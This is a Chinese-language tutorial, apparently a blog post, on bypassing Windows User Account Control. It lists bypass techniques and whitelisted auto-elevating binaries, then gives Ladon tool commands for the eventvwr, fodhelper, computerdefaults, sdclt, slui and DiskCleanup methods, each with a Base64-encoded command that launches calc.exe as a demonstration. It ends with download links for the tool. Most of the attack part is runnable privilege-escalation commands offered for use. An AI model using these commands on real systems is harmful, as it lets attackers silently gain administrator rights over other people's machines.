什么是UAC

根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限权限的账户.

通过 UAC，应用程序和任务可始终在非管理员帐户的安全上下文中运行，除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装，并防止无意中更改系统设置。

BypassUAC方法

目前公开的绕过UAC的几种方式:

1.各类的UAC白名单程序的DLL劫持
2.各类自动提升权限的COM接口利用(Elevated COM interface)
3.Windows 自身漏洞提权
4.远程注入

UACME: https://github.com/hfiref0x/UACME,内含60+种BypassUAC的方法，有兴趣可自行研究

利用白名单

如果进程本身具有管理员权限或者可以直接获取管理员权限的话,就不会弹出UAC框让用户确认,这类程序被称为白名单程序，例如：slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe，rundll32.exe，explorer.exe等等。

Ladon 8.0

[+] BypassUac 五种方法UAC提权（非交互式执行Base64加密CMD命令）
用法Ladon BypassUac

eventvwr
fodhelper
computerdefaults
sdclt
slui

[+] BypassUac2 eventvwr方法执行明文cmd命令（即8.0前的bypassUAC）

Ladon用法

Load BypassUAC
Usage:
Method: eventvwr, fodhelper,computerdefaults, sdclt, slui
Default Bypass Method is eventvwr
Ladon BypassUAC Method Base64Cmd
Example:
Ladon BypassUAC eventvwr Y2FsYw==

Base64Cmd: 使用Ladon8.0 GUI版EnCode模块里的Base64Encode加密

Example

Example usage for eventvwr bypass to launch calc.exe

Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for fodhelper bypass to launch calc.exe

Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for computerdefaults bypass to launch calc.exe

Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for sdclt bypass to launch calc.exe

Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Note: this appears to only work on Windows 10 in my testing

Example usage for slui bypass to launch calc.exe

Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for DiskCleanup bypass to launch calc.exe

Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==

Ladon下载

LadonGo3.4: https://github.com/k8gege/LadonGo
PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
Ladon 7.0版本：http://k8gege.org/Download
Ladon 8.0版本：K8小密圈